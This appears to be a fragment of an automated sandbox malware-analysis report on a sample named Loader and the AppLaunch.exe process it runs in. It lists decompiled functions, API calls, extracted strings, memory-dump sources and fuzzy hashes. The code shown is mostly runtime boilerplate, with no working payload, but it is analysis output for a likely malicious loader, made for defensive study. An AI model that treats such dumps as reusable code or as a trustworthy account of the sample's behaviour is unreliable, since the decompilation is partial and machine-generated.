0x00000000
0x00aec5c6
0x00aec5be
0x00aec631
0x00aec635
0x00aec635

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00AEC497

Strings

RCC, xrefs: 00AEC4B1
MOC, xrefs: 00AEC4A9

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: c733a5e64e8b1c736703cbc9a632046828e5b6c7aa78b7b0ad72cd03fe945bb3
Instruction ID: 10fae546b793f673a12e2723afa9e83cb6a51ec8f2803dfa0857bddadb32184f
Opcode Fuzzy Hash: c733a5e64e8b1c736703cbc9a632046828e5b6c7aa78b7b0ad72cd03fe945bb3
Instruction Fuzzy Hash: 0A418972900249EFCF16DF99CD81AEEBBB5FF08310F188199F904A7251D335AA51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AF48FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00AF48FD(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				signed int _t2;
				intOrPtr _t5;
				signed int _t6;
				void* _t25;
				signed int _t26;
				void* _t28;
				void* _t33;
				void* _t34;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				long _t40;
				void* _t43;

				_t33 = __edx;
				_t28 = __ecx;
				_t25 = __ebx;
				_t1 =  *0xb36d20; // 0x5
				_push(_t39);
				_t45 = _t1 - 0xffffffff;
				if(_t1 == 0xffffffff) {
					L5:
					_t2 = E00AF6B67(__eflags, _t1, 0xffffffff);
					__eflags = _t2;
					if(_t2 == 0) {
						goto L14;
					} else {
						_t39 = E00AF4A92(1, 0x364);
						_pop(_t28);
						__eflags = _t39;
						if(__eflags != 0) {
							__eflags = E00AF6B67(__eflags,  *0xb36d20, _t39);
							if(__eflags != 0) {
								E00AF466E(_t39, "(4}");
								E00AF4AEF(0);
								_t43 = _t43 + 0xc;
								goto L12;
							} else {
								E00AF6B67(__eflags,  *0xb36d20, _t17);
								_push(_t39);
								goto L8;
							}
						} else {
							E00AF6B67(__eflags,  *0xb36d20, _t16);
							_push(_t39);
							L8:
							E00AF4AEF();
							_pop(_t28);
							goto L14;
						}
					}
				} else {
					_t39 = E00AF6B28(_t45, _t1);
					if(_t39 == 0) {
						_t1 =  *0xb36d20; // 0x5
						goto L5;
					} else {
						if(_t39 == 0xffffffff) {
							L14:
							E00AF0E59(_t25, _t28, _t33, _t34, _t39);
							asm("int3");
							_push(_t25);
							_push(_t39);
							_push(_t34);
							_t40 = GetLastError();
							_t5 =  *0xb36d20; // 0x5
							__eflags = _t5 - 0xffffffff;
							if(__eflags == 0) {
								L21:
								_t6 = E00AF6B67(__eflags, _t5, 0xffffffff);
								__eflags = _t6;
								if(_t6 == 0) {
									goto L18;
								} else {
									_t35 = E00AF4A92(1, 0x364);
									__eflags = _t35;
									if(__eflags != 0) {
										__eflags = E00AF6B67(__eflags,  *0xb36d20, _t35);
										if(__eflags != 0) {
											E00AF466E(_t35, "(4}");
											E00AF4AEF(0);
											goto L28;
										} else {
											_t26 = 0;
											E00AF6B67(__eflags,  *0xb36d20, 0);
											_push(_t35);
											goto L24;
										}
									} else {
										_t26 = 0;
										__eflags = 0;
										E00AF6B67(0,  *0xb36d20, 0);
										_push(0);
										L24:
										E00AF4AEF();
										goto L19;
									}
								}
							} else {
								_t35 = E00AF6B28(__eflags, _t5);
								__eflags = _t35;
								if(__eflags == 0) {
									_t5 =  *0xb36d20; // 0x5
									goto L21;
								} else {
									__eflags = _t35 - 0xffffffff;
									if(_t35 != 0xffffffff) {
										L28:
										_t26 = _t35;
									} else {
										L18:
										_t26 = 0;
										__eflags = 0;
										L19:
										_t35 = _t26;
									}
								}
							}
							SetLastError(_t40);
							asm("sbb edi, edi");
							_t37 =  ~_t35 & _t26;
							__eflags = _t37;
							return _t37;
						} else {
							L12:
							if(_t39 == 0) {
								goto L14;
							} else {
								return _t39;
							}
						}
					}
				}
			}

0x00af48fd
0x00af48fd
0x00af48fd
0x00af48fd
0x00af4902
0x00af4903
0x00af4906
0x00af4920
0x00af4923
0x00af4928
0x00af492a
0x00000000
0x00af492c
0x00af4938
0x00af493b
0x00af493c
0x00af493e
0x00af4961
0x00af4963
0x00af497a
0x00af4981
0x00af4986
0x00000000
0x00af4965
0x00af496c
0x00af4971
0x00000000
0x00af4971
0x00af4940
0x00af4947
0x00af494c
0x00af494d
0x00af494d
0x00af4952
0x00000000
0x00af4952
0x00af493e
0x00af4908
0x00af490e
0x00af4912
0x00af491b
0x00000000
0x00af4914
0x00af4917
0x00af4991
0x00af4991
0x00af4996
0x00af4999
0x00af499a
0x00af499b
0x00af49a2
0x00af49a4
0x00af49a9
0x00af49ac
0x00af49ca
0x00af49cd
0x00af49d2
0x00af49d4
0x00000000
0x00af49d6
0x00af49e2
0x00af49e6
0x00af49e8
0x00af4a0d
0x00af4a0f
0x00af4a28
0x00af4a2f
0x00000000
0x00af4a11
0x00af4a11
0x00af4a1a
0x00af4a1f
0x00000000
0x00af4a1f
0x00af49ea
0x00af49ea
0x00af49ea
0x00af49f3
0x00af49f8
0x00af49f9
0x00af49f9
0x00000000
0x00af49fe
0x00af49e8
0x00af49ae
0x00af49b4
0x00af49b6
0x00af49b8
0x00af49c5
0x00000000
0x00af49ba
0x00af49ba
0x00af49bd
0x00af4a37
0x00af4a37
0x00af49bf
0x00af49bf
0x00af49bf
0x00af49bf
0x00af49c1
0x00af49c1
0x00af49c1
0x00af49bd
0x00af49b8
0x00af4a3a
0x00af4a42
0x00af4a44
0x00af4a44
0x00af4a4b
0x00af4919
0x00af4989
0x00af498b
0x00000000
0x00af498d
0x00af4990
0x00af4990
0x00af498b
0x00af4917
0x00af4912

APIs

_free.LIBCMT ref: 00AF494D
_free.LIBCMT ref: 00AF4981

Strings

(4}, xrefs: 00AF4974

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free
String ID: (4}
API String ID: 269201875-1551970364
Opcode ID: 0915afa735861f50f99964d3fe2a71d67a53978ffad3bd99ea8d1d5d3fff01fe
Instruction ID: f524fdf8d5070ad722646781d765ac75d8940488977bad916b6132b372e58fa3
Opcode Fuzzy Hash: 0915afa735861f50f99964d3fe2a71d67a53978ffad3bd99ea8d1d5d3fff01fe
Instruction Fuzzy Hash: 5A014F72B4962D76E62133F4BE82F7F6658AB0D770B240620BB64E61E2EF918C004295

Uniqueness

Uniqueness Score: -1.00%

Function 00AE3400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AE3400() {
				char _v4;
				void* __ecx;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr* _t8;
				intOrPtr* _t11;

				_t11 = _t8;
				if( *_t11 == 0) {
					E00AE708B( &_v4, 0);
					if( *_t11 == 0) {
						_t6 =  *0xb37b88; // 0x3
						_t7 = _t6 + 1;
						 *0xb37b88 = _t7;
						 *_t11 = _t7;
					}
					E00AE70E3( &_v4);
				}
				return  *_t11;
			}

0x00ae3402
0x00ae3407
0x00ae340f
0x00ae3417
0x00ae3419
0x00ae341e
0x00ae341f
0x00ae3424
0x00ae3424
0x00ae342a
0x00ae342a
0x00ae3433

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AE340F
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE342A

Strings

ios_base::badbit set, xrefs: 00AE3401

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: ios_base::badbit set
API String ID: 593203224-3882152299
Opcode ID: bab7d31b241085818ef05847106b048a4cb835b741e16ffcb58ae6cffbd98132
Instruction ID: 774f50ddd8f6a210f5e33866aa5d3ccade05140788fa876d9ca978a18635ed40
Opcode Fuzzy Hash: bab7d31b241085818ef05847106b048a4cb835b741e16ffcb58ae6cffbd98132
Instruction Fuzzy Hash: 72E0ECB2518251DFDB25DF59E951B99B7E4EB18321F20446EE0C593190FFB069C0DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00AF1EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AF1EBA() {

				 *0xb384ec = GetCommandLineA();
				 *0xb384f0 = GetCommandLineW();
				return 1;
			}

0x00af1ec0
0x00af1ecb
0x00af1ed2

APIs

GetCommandLineA.KERNEL32 ref: 00AF1EBA
GetCommandLineW.KERNEL32 ref: 00AF1EC5

Strings

#|, xrefs: 00AF1EC0

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: #|
API String ID: 3253501508-53206762
Opcode ID: e37754ccd5d476ad1ef0a015e9bfe02b3187a7f6e75379aba95ceca0ddf9ed94
Instruction ID: 148de55dbd8ea4690eff81b58cf4809433bdd7f7ea939d700963ea4f4d15fae3
Opcode Fuzzy Hash: e37754ccd5d476ad1ef0a015e9bfe02b3187a7f6e75379aba95ceca0ddf9ed94
Instruction Fuzzy Hash: 19B048788007028BCB208F24AC2C10D3EB0B269342390409AE41183BA0EF340004CF81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 100012, Parent PID: 5244COMMON

Executed Functions

Function 0AC2D588 Relevance: 4.5, Strings: 3, Instructions: 752COMMON

Download Yara Rule

Strings

8^Gl, xrefs: 0AC2DE7D
8^Gl, xrefs: 0AC2DA2A
@B/, xrefs: 0AC2D89F

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID: 8^Gl$8^Gl$@B/
API String ID: 0-838341922
Opcode ID: b243dd0397b0164d9f713a26ea8fe087826600b63e466f5b8a3d1d5e2327e26b
Instruction ID: 894c02e6d60a844cca422189bab8de9b2687340163c700f1b658c9d7f0c65681
Opcode Fuzzy Hash: b243dd0397b0164d9f713a26ea8fe087826600b63e466f5b8a3d1d5e2327e26b
Instruction Fuzzy Hash: 44829E74A01268CFEB65CF69C988BDDBBB2BF49304F1181E9D40AA7251DB319E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2EB00 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

8^Gl, xrefs: 0AC2ED76
8^Gl, xrefs: 0AC2EE60

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID: 8^Gl$8^Gl
API String ID: 0-1360444871
Opcode ID: a99b2697da803abbefc4c6c19b91757346b28e4eb7496b3baa38e33e7441785d
Instruction ID: aaa57a22a3524fe00997a77940c4453dbb8650ce91ec0f48fea02468e0bc76a0
Opcode Fuzzy Hash: a99b2697da803abbefc4c6c19b91757346b28e4eb7496b3baa38e33e7441785d
Instruction Fuzzy Hash: 77F1CF74A01228CFDB68DF64C890BDEB7B2AF89304F1185E9C509A7754DB31AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0AC20040 Relevance: 1.8, Strings: 1, Instructions: 525COMMON

Download Yara Rule

Strings

8^Gl, xrefs: 0AC20399

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID: 8^Gl
API String ID: 0-2311452761
Opcode ID: 46f41cc072fd470007cb4a79dd5dc070e4a48935f78325633d8a3f1638a5e453
Instruction ID: 39613cd42b7259b6ada4fa9c00718362e23c95f127deb4ef883abbe6a8de0ba7
Opcode Fuzzy Hash: 46f41cc072fd470007cb4a79dd5dc070e4a48935f78325633d8a3f1638a5e453
Instruction Fuzzy Hash: 8A42BF74E052288FDB64DF64C854BEEB7B2AF89304F1085EAC54AAB350DB315E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 053E0908 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396152236.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_53e0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a276570936055135b3d84f258198f5355f78d8e4fd1364d9871807322691b6d
Instruction ID: a03d1464095f0c0a1bd12a39a9ef9f732e590ea759696c82bbc87233cbfdec49
Opcode Fuzzy Hash: 2a276570936055135b3d84f258198f5355f78d8e4fd1364d9871807322691b6d
Instruction Fuzzy Hash: 2822E275A01228CFDB65DF60C958BD9BBB2FF4A304F0084E9D509AB2A0DB759AC4CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0AC211E8 Relevance: .5, Instructions: 496COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc27f1ef1188e3ba3bd7b7ac7a4d6d51a5923d45864ce5bfab625dc1b3a8a7ab
Instruction ID: 003c8740eb996b1dd35b86ce0881190c9de14afd48118002b0908a58ffd08797
Opcode Fuzzy Hash: cc27f1ef1188e3ba3bd7b7ac7a4d6d51a5923d45864ce5bfab625dc1b3a8a7ab
Instruction Fuzzy Hash: 5F32CF74E05268CFDB24DF65C884BDEB7B2AF89304F1581E9C509AB254DB349E85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2BEE0 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12397d4634fcfc6a98e8e58022968590c712da350445f3546b4b65edeb6fb272
Instruction ID: ec4e74596450697d086201ee4e9f2444ee922437bd0d46826bf12770c05a9c83
Opcode Fuzzy Hash: 12397d4634fcfc6a98e8e58022968590c712da350445f3546b4b65edeb6fb272
Instruction Fuzzy Hash: 80125A74E052688FDB64DF68C880BDDBBB2AF89304F1185EAD509AB350DB319E85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2E2E8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef1b25509690b85fdbaa8c3fe536e24bab6435c3cdf4376ad2f9479257bae92
Instruction ID: 5a5c7dacfe5e27b29a8e4333570d745de1ec0d2bde163310dbacae272bb8516a
Opcode Fuzzy Hash: 1ef1b25509690b85fdbaa8c3fe536e24bab6435c3cdf4376ad2f9479257bae92
Instruction Fuzzy Hash: 68E1DE74E05228CFDB64CFA5C844BAEBBB2BF89304F1181AAC549BB654DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0AC21CA8 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9492dba75f9f22bb13c96b052d85a146af5ab92719193d957d980b3a98b6a3a4
Instruction ID: 9b6895523aeb9241e854fc08cdda7bfe7e47666809b60cb5798a38b8dbb2466e
Opcode Fuzzy Hash: 9492dba75f9f22bb13c96b052d85a146af5ab92719193d957d980b3a98b6a3a4
Instruction Fuzzy Hash: 5CC1D170E05268CFEB24DFA5C884B9EBBB2BF89304F1581A9C419AB354DB345E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0AC20CB0 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a01575b95a36f8ac18fe64e0b01493339bf300e7beec44647e359152ef87444
Instruction ID: 4f72d49e61330a5687ce28b732dea998d04719c447086534fa452bc7f997df71
Opcode Fuzzy Hash: 5a01575b95a36f8ac18fe64e0b01493339bf300e7beec44647e359152ef87444
Instruction Fuzzy Hash: C6C1B074E01228CFEB68DFA5D994B9DBBB2BF89300F2181AAD409A7351DB315D85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2F490 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633657753ac155b5620283b27b71cc6f3b04c1c93a1724d4314eba7d41238498
Instruction ID: e50f3d2175db181516d0c6570583e26568be4644cbebdaf8bbb9b0a8ee7d4cb1
Opcode Fuzzy Hash: 633657753ac155b5620283b27b71cc6f3b04c1c93a1724d4314eba7d41238498
Instruction Fuzzy Hash: A0A1B074E01328CFDB24DFA9D940A9DBBB2BF8A304F2181A9D409AB351DB355985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0AC22248 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128682ecdf5e15ffad0d19f77d1ec02429b070dde618668ed18e2273bdef1d01
Instruction ID: ba407127a7e7f0ff38df946ee3b789a004541f4e153a5fcb7702d5567c05c30a
Opcode Fuzzy Hash: 128682ecdf5e15ffad0d19f77d1ec02429b070dde618668ed18e2273bdef1d01
Instruction Fuzzy Hash: 4391B074E01218CFDB28CFA9D584ADDBBB2FF89305F208569D809AB355DB359986CF04

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2E2DB Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68468af09060e7b60f409e442832190ce77e8283f790b0ae52685d5e27efee4c
Instruction ID: 68a474b667369e5f1cc13e7899dae5ad8d9b461ae0da5d8d1ad43bb5de2a5c6d
Opcode Fuzzy Hash: 68468af09060e7b60f409e442832190ce77e8283f790b0ae52685d5e27efee4c
Instruction Fuzzy Hash: 6091C370E01228CFDB68DFA5C854B9EBBB2BF89304F1081AAC549BB654DB305E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0AC21C98 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae776841a942feada0f094f1db1f2c60ceb63dcbd3afc479e2530cec763e8b4a
Instruction ID: ebe8998b63d1b7f1bfadfc43515b2a439c4684b3da815a696699dee5535c5c31
Opcode Fuzzy Hash: ae776841a942feada0f094f1db1f2c60ceb63dcbd3afc479e2530cec763e8b4a
Instruction Fuzzy Hash: A241D3B1E01258CBEB18DFAAC5546DEBBF2BF89300F25D52AC408AB354EB345946CF41

Uniqueness

Uniqueness Score: -1.00%

Function 099B0048 Relevance: 34.4, Strings: 27, Instructions: 674COMMON

Download Yara Rule

Strings

xPGl, xrefs: 099B0A3B
xPGl, xrefs: 099B0963
xPGl, xrefs: 099B0ADD
xPGl, xrefs: 099B0BEB
xPGl, xrefs: 099B08C1
xPGl, xrefs: 099B0999
xPGl, xrefs: 099B0A71
xPGl, xrefs: 099B092D
xPGl, xrefs: 099B0AA7
xPGl, xrefs: 099B088B
xPGl, xrefs: 099B077D
xPGl, xrefs: 099B06DB
xPGl, xrefs: 099B09CF
xPGl, xrefs: 099B0B7F
xPGl, xrefs: 099B0C57
xPGl, xrefs: 099B0A05
xPGl, xrefs: 099B07E9
xPGl, xrefs: 099B0747
xPGl, xrefs: 099B081F
xPGl, xrefs: 099B0B13
xPGl, xrefs: 099B07B3
xPGl, xrefs: 099B08F7
xPGl, xrefs: 099B0BB5
xPGl, xrefs: 099B0711
xPGl, xrefs: 099B0855
xPGl, xrefs: 099B0C21
xPGl, xrefs: 099B0B49

Memory Dump Source

Source File: 00000002.00000002.452914904.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_99b0000_AppLaunch.jbxd

Similarity

API ID:
String ID: xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl$xPGl
API String ID: 0-3586613138
Opcode ID: a3c024f622982e20cb355ecb26900c013fbb3713d638a9b568cb5b6c812601be
Instruction ID: 18f5f6723ef3c562d6ff08abe8d61c12d0b61886a3a6fc7e66abd49d7166b175
Opcode Fuzzy Hash: a3c024f622982e20cb355ecb26900c013fbb3713d638a9b568cb5b6c812601be
Instruction Fuzzy Hash: 63428A303546148FCB68DF64C490A6EB2B2EFC6609F01496CD2479FB94CBB5ED498BD2

Uniqueness

Uniqueness Score: -1.00%

Function 099B3C52 Relevance: 7.7, Strings: 5, Instructions: 1440COMMON

Download Yara Rule

Strings

xPGl, xrefs: 099B41C4
xPGl, xrefs: 099B41FA
xPGl, xrefs: 099B4266
xPGl, xrefs: 099B429C
xPGl, xrefs: 099B4230

Memory Dump Source

Source File: 00000002.00000002.452914904.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_99b0000_AppLaunch.jbxd

Similarity

API ID:
String ID: xPGl$xPGl$xPGl$xPGl$xPGl
API String ID: 0-474805156
Opcode ID: 8da704a7c4c46a13209cf39ae617795e7f9ee3d66c71b0206866bb21ebfb05ee
Instruction ID: dbe305eb9ac44128f3e7b93cc9c320cd6f7f3127f97a4fe40e3adc2e170b276e
Opcode Fuzzy Hash: 8da704a7c4c46a13209cf39ae617795e7f9ee3d66c71b0206866bb21ebfb05ee
Instruction Fuzzy Hash: B2F1D0307042448FDB14DB64C591A6EBBA6EF89308F05486DE646CF7A2CF79DC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 099B0CE8 Relevance: 4.4, Strings: 3, Instructions: 617COMMON

Download Yara Rule

Strings

<, xrefs: 099B131B
T, xrefs: 099B13CF
l, xrefs: 099B142F

Memory Dump Source

Source File: 00000002.00000002.452914904.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_99b0000_AppLaunch.jbxd

Similarity

API ID:
String ID: <$T$l
API String ID: 0-1808733367
Opcode ID: 92ae6b5319503618c99c0927d5021b6fe5450c358aaa53accafe1b8404141157
Instruction ID: d27b6bad2fa932724a477cdfb8ca5252e7d77692915ac3694e2fe9574cccaf92
Opcode Fuzzy Hash: 92ae6b5319503618c99c0927d5021b6fe5450c358aaa53accafe1b8404141157
Instruction Fuzzy Hash: EB22B030B042449FDB14CB64C964EBEBBA6FF89304F158469E606CB7A5CB78DC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 099B11E8 Relevance: 3.9, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

<, xrefs: 099B131B
T, xrefs: 099B13CF
l, xrefs: 099B142F

Memory Dump Source

Source File: 00000002.00000002.452914904.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_99b0000_AppLaunch.jbxd

Similarity

API ID:
String ID: <$T$l
API String ID: 0-1808733367
Opcode ID: e210e022f56702af431f5e41623273cc9136e86d013031496d815f6a658570dc
Instruction ID: 54cd4067503b9f2973878f23b3eac6bf84cb7ca555414ce8f391873cd1bd249d
Opcode Fuzzy Hash: e210e022f56702af431f5e41623273cc9136e86d013031496d815f6a658570dc
Instruction Fuzzy Hash: 6941D534704201AFDB249A65D961FAE769BEF98708F14446CE7028F7E1CEB4DC058792

Uniqueness

Uniqueness Score: -1.00%

Function 099B14DA Relevance: 2.8, Strings: 2, Instructions: 338COMMON

Download Yara Rule

Strings

xPGl, xrefs: 099B1A55
xPGl, xrefs: 099B1A8B

Memory Dump Source

Source File: 00000002.00000002.452914904.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_99b0000_AppLaunch.jbxd

Similarity

API ID:
String ID: xPGl$xPGl
API String ID: 0-193255877
Opcode ID: 70580b45b81361f7c657c502e68a2d6dd314bdafd73554284fa7532ba5175bfb
Instruction ID: b80fb655954cf29adb05724d382b0602264e5198aaf76fc310ac72928c8b3799
Opcode Fuzzy Hash: 70580b45b81361f7c657c502e68a2d6dd314bdafd73554284fa7532ba5175bfb
Instruction Fuzzy Hash: 52C1C4347082448FDB248B65C5A1EBE77AAEF89308F154469E6468F3A2CF78DC45C792

Uniqueness

Uniqueness Score: -1.00%

Function 0AC25E70 Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

$%Cl, xrefs: 0AC25EB8
$%Cl, xrefs: 0AC25EF2

Memory Dump Source

